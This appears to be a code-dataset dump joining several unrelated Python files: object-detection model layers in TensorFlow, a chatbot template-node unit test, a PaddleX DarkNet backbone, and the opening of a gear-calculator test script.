ymins = tf.minimum(
tf.maximum(0.0, ymins), mc.IMAGE_HEIGHT-1.0, name='bbox_ymin')
self._activation_summary(ymins, 'box_ymin')
xmaxs = tf.maximum(
tf.minimum(mc.IMAGE_WIDTH-1.0, xmaxs), 0.0, name='bbox_xmax')
self._activation_summary(xmaxs, 'box_xmax')
ymaxs = tf.maximum(
tf.minimum(mc.IMAGE_HEIGHT-1.0, ymaxs), 0.0, name='bbox_ymax')
self._activation_summary(ymaxs, 'box_ymax')
self.det_boxes = tf.transpose(
tf.stack(util.bbox_transform_inv([xmins, ymins, xmaxs, ymaxs])),
(1, 2, 0), name='bbox'
)
with tf.variable_scope('IOU'):
def _tensor_iou(box1, box2):
with tf.variable_scope('intersection'):
xmin = tf.maximum(box1[0], box2[0], name='xmin')
ymin = tf.maximum(box1[1], box2[1], name='ymin')
xmax = tf.minimum(box1[2], box2[2], name='xmax')
ymax = tf.minimum(box1[3], box2[3], name='ymax')
w = tf.maximum(0.0, xmax-xmin, name='inter_w')
h = tf.maximum(0.0, ymax-ymin, name='inter_h')
intersection = tf.multiply(w, h, name='intersection')
with tf.variable_scope('union'):
w1 = tf.subtract(box1[2], box1[0], name='w1')
h1 = tf.subtract(box1[3], box1[1], name='h1')
w2 = tf.subtract(box2[2], box2[0], name='w2')
h2 = tf.subtract(box2[3], box2[1], name='h2')
union = w1*h1 + w2*h2 - intersection
return intersection/(union+mc.EPSILON) \
* tf.reshape(self.input_mask, [mc.BATCH_SIZE, mc.ANCHORS])
self.ious = self.ious.assign(
_tensor_iou(
util.bbox_transform(tf.unstack(self.det_boxes, axis=2)),
util.bbox_transform(tf.unstack(self.box_input, axis=2))
)
)
self._activation_summary(self.ious, 'conf_score')
with tf.variable_scope('probability') as scope:
self._activation_summary(self.pred_class_probs, 'class_probs')
probs = tf.multiply(
self.pred_class_probs,
tf.reshape(self.pred_conf, [mc.BATCH_SIZE, mc.ANCHORS, 1]),
name='final_class_prob'
)
self._activation_summary(probs, 'final_class_prob')
self.det_probs = tf.reduce_max(probs, 2, name='score')
self.det_class = tf.argmax(probs, 2, name='class_idx')
def _add_loss_graph(self):
"""Define the loss operation."""
mc = self.mc
with tf.variable_scope('class_regression') as scope:
# cross-entropy: q * -log(p) + (1-q) * -log(1-p)
# add a small value into log to prevent blowing up
self.class_loss = tf.truediv(
tf.reduce_sum(
(self.labels*(-tf.log(self.pred_class_probs+mc.EPSILON))
+ (1-self.labels)*(-tf.log(1-self.pred_class_probs+mc.EPSILON)))
* self.input_mask * mc.LOSS_COEF_CLASS),
self.num_objects,
name='class_loss'
)
tf.add_to_collection('losses', self.class_loss)
with tf.variable_scope('confidence_score_regression') as scope:
input_mask = tf.reshape(self.input_mask, [mc.BATCH_SIZE, mc.ANCHORS])
self.conf_loss = tf.reduce_mean(
tf.reduce_sum(
tf.square((self.ious - self.pred_conf))
* (input_mask*mc.LOSS_COEF_CONF_POS/self.num_objects
+(1-input_mask)*mc.LOSS_COEF_CONF_NEG/(mc.ANCHORS-self.num_objects)),
reduction_indices=[1]
),
name='confidence_loss'
)
tf.add_to_collection('losses', self.conf_loss)
tf.summary.scalar('mean iou', tf.reduce_sum(self.ious)/self.num_objects)
with tf.variable_scope('bounding_box_regression') as scope:
self.bbox_loss = tf.truediv(
tf.reduce_sum(
mc.LOSS_COEF_BBOX * tf.square(
self.input_mask*(self.pred_box_delta-self.box_delta_input))),
self.num_objects,
name='bbox_loss'
)
tf.add_to_collection('losses', self.bbox_loss)
# add above losses as well as weight decay losses to form the total loss
self.loss = tf.add_n(tf.get_collection('losses'), name='total_loss')
def _add_train_graph(self):
"""Define the training operation."""
mc = self.mc
self.global_step = tf.Variable(0, name='global_step', trainable=False)
lr = tf.train.exponential_decay(mc.LEARNING_RATE,
self.global_step,
mc.DECAY_STEPS,
mc.LR_DECAY_FACTOR,
staircase=True)
tf.summary.scalar('learning_rate', lr)
_add_loss_summaries(self.loss)
opt = tf.train.MomentumOptimizer(learning_rate=lr, momentum=mc.MOMENTUM)
grads_vars = opt.compute_gradients(self.loss, tf.trainable_variables())
with tf.variable_scope('clip_gradient') as scope:
for i, (grad, var) in enumerate(grads_vars):
grads_vars[i] = (tf.clip_by_norm(grad, mc.MAX_GRAD_NORM), var)
apply_gradient_op = opt.apply_gradients(grads_vars, global_step=self.global_step)
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name, var)
for grad, var in grads_vars:
if grad is not None:
tf.summary.histogram(var.op.name + '/gradients', grad)
with tf.control_dependencies([apply_gradient_op]):
self.train_op = tf.no_op(name='train')
def _add_viz_graph(self):
"""Define the visualization operation."""
mc = self.mc
self.image_to_show = tf.placeholder(
tf.float32, [None, mc.IMAGE_HEIGHT, mc.IMAGE_WIDTH, 3],
name='image_to_show'
)
self.viz_op = tf.summary.image('sample_detection_results',
self.image_to_show, collections='image_summary',
max_outputs=mc.BATCH_SIZE)
def _conv_bn_layer(
self, inputs, conv_param_name, bn_param_name, scale_param_name, filters,
size, stride, padding='SAME', freeze=False, relu=True,
conv_with_bias=False, stddev=0.001):
""" Convolution + BatchNorm + [relu] layer. Batch mean and var are treated
as constant. Weights have to be initialized from a pre-trained model or
restored from a checkpoint.
Args:
inputs: input tensor
conv_param_name: name of the convolution parameters
bn_param_name: name of the batch normalization parameters
scale_param_name: name of the scale parameters
filters: number of output filters.
size: kernel size.
stride: stride
padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description.
freeze: if true, then do not train the parameters in this layer.
xavier: whether to use xavier weight initializer or not.
relu: whether to use relu or not.
conv_with_bias: whether or not add bias term to the convolution output.
stddev: standard deviation used for random weight initializer.
Returns:
A convolutional layer operation.
"""
mc = self.mc
with tf.variable_scope(conv_param_name) as scope:
channels = inputs.get_shape()[3]
if mc.LOAD_PRETRAINED_MODEL:
cw = self.caffemodel_weight
kernel_val = np.transpose(cw[conv_param_name][0], [2,3,1,0])
if conv_with_bias:
bias_val = cw[conv_param_name][1]
mean_val = cw[bn_param_name][0]
var_val = cw[bn_param_name][1]
gamma_val = cw[scale_param_name][0]
beta_val = cw[scale_param_name][1]
else:
kernel_val = tf.truncated_normal_initializer(
stddev=stddev, dtype=tf.float32)
if conv_with_bias:
bias_val = tf.constant_initializer(0.0)
mean_val = tf.constant_initializer(0.0)
var_val = tf.constant_initializer(1.0)
gamma_val = tf.constant_initializer(1.0)
beta_val = tf.constant_initializer(0.0)
# re-order the caffe kernel with shape [out, in, h, w] -> tf kernel with
# shape [h, w, in, out]
kernel = _variable_with_weight_decay(
'kernels', shape=[size, size, int(channels), filters],
wd=mc.WEIGHT_DECAY, initializer=kernel_val, trainable=(not freeze))
self.model_params += [kernel]
if conv_with_bias:
biases = _variable_on_device('biases', [filters], bias_val,
trainable=(not freeze))
self.model_params += [biases]
gamma = _variable_on_device('gamma', [filters], gamma_val,
trainable=(not freeze))
beta = _variable_on_device('beta', [filters], beta_val,
trainable=(not freeze))
mean = _variable_on_device('mean', [filters], mean_val, trainable=False)
var = _variable_on_device('var', [filters], var_val, trainable=False)
self.model_params += [gamma, beta, mean, var]
conv = tf.nn.conv2d(
inputs, kernel, [1, stride, stride, 1], padding=padding,
name='convolution')
if conv_with_bias:
conv = tf.nn.bias_add(conv, biases, name='bias_add')
conv = tf.nn.batch_normalization(
conv, mean=mean, variance=var, offset=beta, scale=gamma,
variance_epsilon=mc.BATCH_NORM_EPSILON, name='batch_norm')
self.model_size_counter.append(
(conv_param_name, (1+size*size*int(channels))*filters)
)
out_shape = conv.get_shape().as_list()
num_flops = \
(1+2*int(channels)*size*size)*filters*out_shape[1]*out_shape[2]
if relu:
num_flops += 2*filters*out_shape[1]*out_shape[2]
self.flop_counter.append((conv_param_name, num_flops))
self.activation_counter.append(
(conv_param_name, out_shape[1]*out_shape[2]*out_shape[3])
)
if relu:
return tf.nn.relu(conv)
else:
return conv
def _conv_layer(
self, layer_name, inputs, filters, size, stride, padding='SAME',
freeze=False, xavier=False, relu=True, stddev=0.001):
"""Convolutional layer operation constructor.
Args:
layer_name: layer name.
inputs: input tensor
filters: number of output filters.
size: kernel size.
stride: stride
padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description.
freeze: if true, then do not train the parameters in this layer.
xavier: whether to use xavier weight initializer or not.
relu: whether to use relu or not.
stddev: standard deviation used for random weight initializer.
Returns:
A convolutional layer operation.
"""
mc = self.mc
use_pretrained_param = False
if mc.LOAD_PRETRAINED_MODEL:
cw = self.caffemodel_weight
if layer_name in cw:
kernel_val = np.transpose(cw[layer_name][0], [2,3,1,0])
bias_val = cw[layer_name][1]
# check the shape
if (kernel_val.shape ==
(size, size, inputs.get_shape().as_list()[-1], filters)) \
and (bias_val.shape == (filters, )):
use_pretrained_param = True
else:
print ('Shape of the pretrained parameter of {} does not match, '
'use randomly initialized parameter'.format(layer_name))
else:
print ('Cannot find {} in the pretrained model. Use randomly initialized '
'parameters'.format(layer_name))
if mc.DEBUG_MODE:
print('Input tensor shape to {}: {}'.format(layer_name, inputs.get_shape()))
with tf.variable_scope(layer_name) as scope:
channels = inputs.get_shape()[3]
# re-order the caffe kernel with shape [out, in, h, w] -> tf kernel with
# shape [h, w, in, out]
if use_pretrained_param:
if mc.DEBUG_MODE:
print ('Using pretrained model for {}'.format(layer_name))
kernel_init = tf.constant(kernel_val , dtype=tf.float32)
bias_init = tf.constant(bias_val, dtype=tf.float32)
elif xavier:
kernel_init = tf.contrib.layers.xavier_initializer_conv2d()
bias_init = tf.constant_initializer(0.0)
else:
kernel_init = tf.truncated_normal_initializer(
stddev=stddev, dtype=tf.float32)
bias_init = tf.constant_initializer(0.0)
kernel = _variable_with_weight_decay(
'kernels', shape=[size, size, int(channels), filters],
wd=mc.WEIGHT_DECAY, initializer=kernel_init, trainable=(not freeze))
biases = _variable_on_device('biases', [filters], bias_init,
trainable=(not freeze))
self.model_params += [kernel, biases]
conv = tf.nn.conv2d(
inputs, kernel, [1, stride, stride, 1], padding=padding,
name='convolution')
conv_bias = tf.nn.bias_add(conv, biases, name='bias_add')
if relu:
out = tf.nn.relu(conv_bias, 'relu')
else:
out = conv_bias
self.model_size_counter.append(
(layer_name, (1+size*size*int(channels))*filters)
)
out_shape = out.get_shape().as_list()
num_flops = \
(1+2*int(channels)*size*size)*filters*out_shape[1]*out_shape[2]
if relu:
num_flops += 2*filters*out_shape[1]*out_shape[2]
self.flop_counter.append((layer_name, num_flops))
self.activation_counter.append(
(layer_name, out_shape[1]*out_shape[2]*out_shape[3])
)
return out
def _pooling_layer(
self, layer_name, inputs, size, stride, padding='SAME'):
"""Pooling layer operation constructor.
Args:
layer_name: layer name.
inputs: input tensor
size: kernel size.
stride: stride
padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description.
Returns:
A pooling layer operation.
"""
with tf.variable_scope(layer_name) as scope:
out = tf.nn.max_pool(inputs,
ksize=[1, size, size, 1],
strides=[1, stride, stride, 1],
padding=padding)
activation_size = np.prod(out.get_shape().as_list()[1:])
self.activation_counter.append((layer_name, activation_size))
return out
def _fc_layer(
self, layer_name, inputs, hiddens, flatten=False, relu=True,
xavier=False, stddev=0.001):
"""Fully connected layer operation constructor.
Args:
layer_name: layer name.
inputs: input tensor
hiddens: number of (hidden) neurons in this layer.
flatten: if true, reshape the input 4D tensor of shape
(batch, height, weight, channel) into a 2D tensor with shape
(batch, -1). This is used when the input to the fully connected layer
is output of a convolutional layer.
relu: whether to use relu or not.
xavier: whether to use xavier weight initializer or not.
stddev: standard deviation used for random weight initializer.
Returns:
A fully connected layer operation.
"""
mc = self.mc
use_pretrained_param = False
if mc.LOAD_PRETRAINED_MODEL:
cw = self.caffemodel_weight
if layer_name in cw:
use_pretrained_param = True
kernel_val = cw[layer_name][0]
bias_val = cw[layer_name][1]
if mc.DEBUG_MODE:
print('Input tensor shape to {}: {}'.format(layer_name, inputs.get_shape()))
with tf.variable_scope(layer_name) as scope:
input_shape = inputs.get_shape().as_list()
if flatten:
dim = input_shape[1]*input_shape[2]*input_shape[3]
inputs = tf.reshape(inputs, [-1, dim])
if use_pretrained_param:
try:
# check the size before layout transform
assert kernel_val.shape == (hiddens, dim), \
'kernel shape error at {}'.format(layer_name)
kernel_val = np.reshape(
np.transpose(
np.reshape(
kernel_val, # O x (C*H*W)
(hiddens, input_shape[3], input_shape[1], input_shape[2])
), # O x C x H x W
(2, 3, 1, 0)
), # H x W x C x O
(dim, -1)
) # (H*W*C) x O
# check the size after layout transform
assert kernel_val.shape == (dim, hiddens), \
'kernel shape error at {}'.format(layer_name)
except:
# Do not use pretrained parameter if shape doesn't match
use_pretrained_param = False
print ('Shape of the pretrained parameter of {} does not match, '
'use randomly initialized parameter'.format(layer_name))
else:
dim = input_shape[1]
if use_pretrained_param:
try:
kernel_val = np.transpose(kernel_val, (1,0))
assert kernel_val.shape == (dim, hiddens), \
'kernel shape error at {}'.format(layer_name)
except:
use_pretrained_param = False
print ('Shape of the pretrained parameter of {} does not match, '
'use randomly initialized parameter'.format(layer_name))
if use_pretrained_param:
if mc.DEBUG_MODE:
print ('Using pretrained model for {}'.format(layer_name))
kernel_init = tf.constant(kernel_val, dtype=tf.float32)
bias_init = tf.constant(bias_val, dtype=tf.float32)
elif xavier:
kernel_init = tf.contrib.layers.xavier_initializer()
bias_init = tf.constant_initializer(0.0)
else:
kernel_init = tf.truncated_normal_initializer(
stddev=stddev, dtype=tf.float32)
bias_init = tf.constant_initializer(0.0)
weights = _variable_with_weight_decay(
'weights', shape=[dim, hiddens], wd=mc.WEIGHT_DECAY,
initializer=kernel_init)
biases = _variable_on_device('biases', [hiddens], bias_init)
self.model_params += [weights, biases]
outputs = tf.nn.bias_add(tf.matmul(inputs, weights), biases)
if relu:
outputs = tf.nn.relu(outputs, 'relu')
# count layer stats
self.model_size_counter.append((layer_name, (dim+1)*hiddens))
num_flops = 2 * dim * hidden + hidden
if relu:
num_flops += 2*hiddens
self.flop_counter.append((layer_name, num_flops))
self.activation_counter.append((layer_name, hiddens))
return outputs
def filter_prediction(self, boxes, probs, cls_idx):
"""Filter bounding box predictions with probability threshold and
non-maximum supression.
Args:
boxes: array of [cx, cy, w, h].
probs: array of probabilities
cls_idx: array of class indices
Returns:
final_boxes: array of filtered bounding boxes.
final_probs: array of filtered probabilities
final_cls_idx: array of filtered class indices
"""
mc = self.mc
if mc.TOP_N_DETECTION < len(probs) and mc.TOP_N_DETECTION > 0:
order = probs.argsort()[:-mc.TOP_N_DETECTION-1:-1]
probs = probs[order]
boxes = boxes[order]
cls_idx = cls_idx[order]
else:
filtered_idx = np.nonzero(probs>mc.PROB_THRESH)[0]
probs = probs[filtered_idx]
boxes = boxes[filtered_idx]
cls_idx = cls_idx[filtered_idx]
final_boxes = []
final_probs = []
final_cls_idx = []
for c in range(mc.CLASSES):
idx_per_class = [i for i in range(len(probs)) if cls_idx[i] == c]
keep = util.nms(boxes[idx_per_class], probs[idx_per_class], mc.NMS_THRESH)
for i in range(len(keep)):
if keep[i]:
final_boxes.append(boxes[idx_per_class[i]])
final_probs.append(probs[idx_per_class[i]])
final_cls_idx.append(c)
return final_boxes, final_probs, final_cls_idx
def _activation_summary(self, x, layer_name):
"""Helper to create summaries for activations.
Args:
x: layer output tensor
layer_name: name of the layer
Returns:
nothing
"""
with tf.variable_scope('activation_summary') as scope:
tf.summary.histogram(
'activation_summary/'+layer_name, x)
tf.summary.scalar(
'activation_summary/'+layer_name+'/sparsity', tf.nn.zero_fraction(x))
tf.summary.scalar(
'activation_summary/'+layer_name+'/average', tf.reduce_mean(x))
tf.summary.scalar(
'activation_summary/'+layer_name+'/max', tf.reduce_max(x))
tf.summary.scalar(
'activation_summary/'+layer_name+'/min', tf.reduce_min(x))
| 37.009537 | 86 | 0.632726 |
b2cfd67059757453f3efd232290f4dbff7a288f5 | 4,637 | py | Python | test/programytest/parser/template/node_tests/test_sraix.py | whackur/chatbot | bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7 | [
"MIT"
] | 2 | 2018-06-16T09:32:22.000Z | 2019-07-21T13:16:00.000Z | test/programytest/parser/template/node_tests/test_sraix.py | whackur/chatbot | bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7 | [
"MIT"
] | 3 | 2020-07-16T04:00:42.000Z | 2021-03-31T18:52:22.000Z | test/programytest/parser/template/node_tests/test_sraix.py | whackur/chatbot | bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7 | [
"MIT"
] | 4 | 2018-06-29T23:50:44.000Z | 2020-11-05T08:13:47.000Z | import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.sraix import TemplateSRAIXNode
from programy.parser.template.nodes.word import TemplateWordNode
from programy.services.service import Service, ServiceFactory
from programy.config.brain.brain import BrainConfiguration
from programy.config.brain.service import BrainServiceConfiguration
from programytest.parser.base import ParserTestsBaseClass
class MockService(Service):
def __init__(self, config):
Service.__init__(self, config)
def ask_question(self, context: str, question: str):
return "asked"
class MockTemplateSRAIXNode(TemplateSRAIXNode):
def __init__(self):
TemplateSRAIXNode.__init__(self)
def resolve_to_string(self, context):
raise Exception("This is an error")
class TemplateSRAIXNodeTests(ParserTestsBaseClass):
def test_node_unsupported_attributes(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSRAIXNode()
self.assertIsNotNone(node)
node.host = "http://somebot.org"
node.botid = "1234567890"
node.hint = "The usual"
node.apikey = "ABCDEF"
node.service = "api"
root.append(node)
self.assertEqual(len(root.children), 1)
self.assertEqual("SRAIX (service=api)", node.to_string())
def test_node_service(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSRAIXNode()
self.assertIsNotNone(node)
node.service = "api"
self.assertEqual("api", node.service)
root.append(node)
self.assertEqual(len(root.children), 1)
self.assertEqual("SRAIX (service=api)", node.to_string())
def test_node_no_service(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSRAIXNode()
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
self.assertEqual("SRAIX ()", node.to_string())
def test_to_xml_service(self):
root = TemplateNode()
node = TemplateSRAIXNode()
node.service = "api"
root.append(node)
node.append(TemplateWordNode("Hello"))
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><sraix service="api">Hello</sraix></template>', xml_str)
def test_to_xml_no_service(self):
root = TemplateNode()
node = TemplateSRAIXNode()
root.append(node)
node.append(TemplateWordNode("Hello"))
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><sraix>Hello</sraix></template>', xml_str)
def test_call_service(self):
service_config = BrainServiceConfiguration("mock")
service_config._classname = 'programytest.services.test_service.MockService'
brain_config = BrainConfiguration()
brain_config.services._services['mock'] = service_config
ServiceFactory.preload_services(brain_config.services)
root = TemplateNode()
node = TemplateSRAIXNode()
node.service = "mock"
root.append(node)
node.append(TemplateWordNode("Hello"))
self.assertEqual("asked", node.resolve(self._client_context))
def test_call_no_service_exists(self):
root = TemplateNode()
node = TemplateSRAIXNode()
node.service = "mock"
root.append(node)
node.append(TemplateWordNode("Hello"))
self.assertEqual("", node.resolve(self._client_context))
def test_call_no_service_defined(self):
root = TemplateNode()
node = TemplateSRAIXNode()
root.append(node)
node.append(TemplateWordNode("Hello"))
self.assertEqual("", node.resolve(self._client_context))
def test_node_exception_handling(self):
root = TemplateNode()
node = MockTemplateSRAIXNode()
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEquals("", result) | 30.30719 | 92 | 0.665516 |
61bcadfbacc9c80eacf0c436a591c67f484a5da4 | 11,105 | py | Python | paddlex/ppdet/modeling/backbones/darknet.py | cheneyveron/PaddleX | 86f73fc6a66b12c638f642524bfd1cf730e26c4b | [
"Apache-2.0"
] | 3,655 | 2020-03-28T09:19:50.000Z | 2022-03-31T13:28:39.000Z | paddlex/ppdet/modeling/backbones/darknet.py | cheneyveron/PaddleX | 86f73fc6a66b12c638f642524bfd1cf730e26c4b | [
"Apache-2.0"
] | 829 | 2020-03-28T04:03:18.000Z | 2022-03-31T14:34:30.000Z | paddlex/ppdet/modeling/backbones/darknet.py | cheneyveron/PaddleX | 86f73fc6a66b12c638f642524bfd1cf730e26c4b | [
"Apache-2.0"
] | 738 | 2020-03-28T03:56:46.000Z | 2022-03-31T13:11:03.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddlex.ppdet.core.workspace import register, serializable
from paddlex.ppdet.modeling.ops import batch_norm, mish
from ..shape_spec import ShapeSpec
__all__ = ['DarkNet', 'ConvBNLayer']
class ConvBNLayer(nn.Layer):
def __init__(self,
ch_in,
ch_out,
filter_size=3,
stride=1,
groups=1,
padding=0,
norm_type='bn',
norm_decay=0.,
act="leaky",
freeze_norm=False,
data_format='NCHW',
name=''):
"""
conv + bn + activation layer
Args:
ch_in (int): input channel
ch_out (int): output channel
filter_size (int): filter size, default 3
stride (int): stride, default 1
groups (int): number of groups of conv layer, default 1
padding (int): padding size, default 0
norm_type (str): batch norm type, default bn
norm_decay (str): decay for weight and bias of batch norm layer, default 0.
act (str): activation function type, default 'leaky', which means leaky_relu
freeze_norm (bool): whether to freeze norm, default False
data_format (str): data format, NCHW or NHWC
"""
super(ConvBNLayer, self).__init__()
self.conv = nn.Conv2D(
in_channels=ch_in,
out_channels=ch_out,
kernel_size=filter_size,
stride=stride,
padding=padding,
groups=groups,
data_format=data_format,
bias_attr=False)
self.batch_norm = batch_norm(
ch_out,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.act = act
def forward(self, inputs):
out = self.conv(inputs)
out = self.batch_norm(out)
if self.act == 'leaky':
out = F.leaky_relu(out, 0.1)
elif self.act == 'mish':
out = mish(out)
return out
class DownSample(nn.Layer):
def __init__(self,
ch_in,
ch_out,
filter_size=3,
stride=2,
padding=1,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
data_format='NCHW'):
"""
downsample layer
Args:
ch_in (int): input channel
ch_out (int): output channel
filter_size (int): filter size, default 3
stride (int): stride, default 2
padding (int): padding size, default 1
norm_type (str): batch norm type, default bn
norm_decay (str): decay for weight and bias of batch norm layer, default 0.
freeze_norm (bool): whether to freeze norm, default False
data_format (str): data format, NCHW or NHWC
"""
super(DownSample, self).__init__()
self.conv_bn_layer = ConvBNLayer(
ch_in=ch_in,
ch_out=ch_out,
filter_size=filter_size,
stride=stride,
padding=padding,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.ch_out = ch_out
def forward(self, inputs):
out = self.conv_bn_layer(inputs)
return out
class BasicBlock(nn.Layer):
def __init__(self,
ch_in,
ch_out,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
data_format='NCHW'):
"""
BasicBlock layer of DarkNet
Args:
ch_in (int): input channel
ch_out (int): output channel
norm_type (str): batch norm type, default bn
norm_decay (str): decay for weight and bias of batch norm layer, default 0.
freeze_norm (bool): whether to freeze norm, default False
data_format (str): data format, NCHW or NHWC
"""
super(BasicBlock, self).__init__()
self.conv1 = ConvBNLayer(
ch_in=ch_in,
ch_out=ch_out,
filter_size=1,
stride=1,
padding=0,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.conv2 = ConvBNLayer(
ch_in=ch_out,
ch_out=ch_out * 2,
filter_size=3,
stride=1,
padding=1,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
def forward(self, inputs):
conv1 = self.conv1(inputs)
conv2 = self.conv2(conv1)
out = paddle.add(x=inputs, y=conv2)
return out
class Blocks(nn.Layer):
def __init__(self,
ch_in,
ch_out,
count,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
name=None,
data_format='NCHW'):
"""
Blocks layer, which consist of some BaickBlock layers
Args:
ch_in (int): input channel
ch_out (int): output channel
count (int): number of BasicBlock layer
norm_type (str): batch norm type, default bn
norm_decay (str): decay for weight and bias of batch norm layer, default 0.
freeze_norm (bool): whether to freeze norm, default False
name (str): layer name
data_format (str): data format, NCHW or NHWC
"""
super(Blocks, self).__init__()
self.basicblock0 = BasicBlock(
ch_in,
ch_out,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.res_out_list = []
for i in range(1, count):
block_name = '{}.{}'.format(name, i)
res_out = self.add_sublayer(
block_name,
BasicBlock(
ch_out * 2,
ch_out,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format))
self.res_out_list.append(res_out)
self.ch_out = ch_out
def forward(self, inputs):
y = self.basicblock0(inputs)
for basic_block_i in self.res_out_list:
y = basic_block_i(y)
return y
DarkNet_cfg = {53: ([1, 2, 8, 8, 4])}
@register
@serializable
class DarkNet(nn.Layer):
__shared__ = ['norm_type', 'data_format']
def __init__(self,
depth=53,
freeze_at=-1,
return_idx=[2, 3, 4],
num_stages=5,
norm_type='bn',
norm_decay=0.,
freeze_norm=False,
data_format='NCHW'):
"""
Darknet, see https://pjreddie.com/darknet/yolo/
Args:
depth (int): depth of network
freeze_at (int): freeze the backbone at which stage
filter_size (int): filter size, default 3
return_idx (list): index of stages whose feature maps are returned
norm_type (str): batch norm type, default bn
norm_decay (str): decay for weight and bias of batch norm layer, default 0.
data_format (str): data format, NCHW or NHWC
"""
super(DarkNet, self).__init__()
self.depth = depth
self.freeze_at = freeze_at
self.return_idx = return_idx
self.num_stages = num_stages
self.stages = DarkNet_cfg[self.depth][0:num_stages]
self.conv0 = ConvBNLayer(
ch_in=3,
ch_out=32,
filter_size=3,
stride=1,
padding=1,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self.downsample0 = DownSample(
ch_in=32,
ch_out=32 * 2,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format)
self._out_channels = []
self.darknet_conv_block_list = []
self.downsample_list = []
ch_in = [64, 128, 256, 512, 1024]
for i, stage in enumerate(self.stages):
name = 'stage.{}'.format(i)
conv_block = self.add_sublayer(
name,
Blocks(
int(ch_in[i]),
32 * (2**i),
stage,
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format,
name=name))
self.darknet_conv_block_list.append(conv_block)
if i in return_idx:
self._out_channels.append(64 * (2**i))
for i in range(num_stages - 1):
down_name = 'stage.{}.downsample'.format(i)
downsample = self.add_sublayer(
down_name,
DownSample(
ch_in=32 * (2**(i + 1)),
ch_out=32 * (2**(i + 2)),
norm_type=norm_type,
norm_decay=norm_decay,
freeze_norm=freeze_norm,
data_format=data_format))
self.downsample_list.append(downsample)
def forward(self, inputs):
x = inputs['image']
out = self.conv0(x)
out = self.downsample0(out)
blocks = []
for i, conv_block_i in enumerate(self.darknet_conv_block_list):
out = conv_block_i(out)
if i == self.freeze_at:
out.stop_gradient = True
if i in self.return_idx:
blocks.append(out)
if i < self.num_stages - 1:
out = self.downsample_list[i](out)
return blocks
@property
def out_shape(self):
return [ShapeSpec(channels=c) for c in self._out_channels]
| 32.565982 | 88 | 0.533093 |
c060c08d639cb61ab85b481e8967a95e1313a62c | 2,945 | py | Python | modular_test.py | ndebuhr/gear-params | ca683bc98d6ecde557f1f60f20f8fe18693707b6 | [
"MIT"
] | null | null | null | modular_test.py | ndebuhr/gear-params | ca683bc98d6ecde557f1f60f20f8fe18693707b6 | [
"MIT"
] | null | null | null | modular_test.py | ndebuhr/gear-params | ca683bc98d6ecde557f1f60f20f8fe18693707b6 | [
"MIT"
] | null | null | null | import subprocess
import sys
class module_test:
def __init__(self, module_char, input_file, output_file, expected_file):
self.m = module_char
self.i = input_file
self.o = output_file
self.e = expected_file
subprocess.call('make',shell=True)
spur_test = module_test('S',
'test_files/spur_input.txt',
'spur_output.txt',
'test_files/spur_expected.txt')
rack_test = module_test('R',
'test_files/rack_input.txt',
'rack_output.txt',
'test_files/rack_expected.txt')
metric_test = module_test('U',
'test_files/metric_input.txt',
'metric_output.txt',
'test_files/metric_expected.txt')
spur_wrong_format = module_test('S',
'test_files/spur_wrong_format.txt',
'spur_output.txt',
'test_files/wrong_expected.txt')
spur_wrong_vals = module_test('S',
'test_files/spur_wrong_vals.txt',
'spur_output.txt',
'test_files/wrong_expected.txt')
rack_wrong_format = module_test('R',
'test_files/rack_wrong_format.txt',
'rack_output.txt',
'test_files/wrong_expected.txt')
rack_wrong_vals = module_test('R',
'test_files/rack_wrong_vals.txt',
'rack_output.txt',
'test_files/wrong_expected.txt')
metric_wrong_format = module_test('U',
'test_files/metric_wrong_format.txt',
'metric_output.txt',
'test_files/wrong_expected.txt')
metric_wrong_vals = module_test('U',
'test_files/metric_wrong_vals.txt',
'metric_output.txt',
'test_files/wrong_expected.txt')
tests=[spur_test,rack_test,metric_test] # correct functioning
tests += [spur_wrong_format,
spur_wrong_vals,
rack_wrong_format,
rack_wrong_vals,
metric_wrong_format,
